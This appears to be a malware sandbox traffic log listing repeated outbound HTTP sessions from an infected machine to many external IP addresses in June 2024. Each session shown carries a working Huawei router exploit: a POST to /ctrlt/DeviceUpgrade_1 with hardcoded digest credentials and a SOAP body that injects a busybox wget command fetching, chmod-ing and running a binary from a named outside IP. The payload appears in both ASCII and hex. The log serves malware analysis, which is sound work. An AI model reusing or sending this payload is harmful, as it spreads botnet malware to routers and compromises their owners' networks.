                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1342192.168.2.155822245.116.172.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398809910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1343192.168.2.1552954102.169.226.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398809910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1344192.168.2.1539476121.39.136.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398832083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1345192.168.2.1555750222.63.120.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398853064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1346192.168.2.153846841.151.136.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398865938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1347192.168.2.1540646121.200.88.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398883104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1348192.168.2.1551060121.114.206.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398893118 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1349192.168.2.154413037.134.12.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398915052 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1350192.168.2.155655045.150.79.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398941994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1351192.168.2.1546432122.239.74.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398956060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1352192.168.2.1556524121.231.102.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398976088 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
